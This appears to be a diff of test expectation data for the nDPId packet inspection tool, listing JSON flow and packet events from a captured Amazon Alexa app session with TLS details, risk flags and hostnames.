+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 
+00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 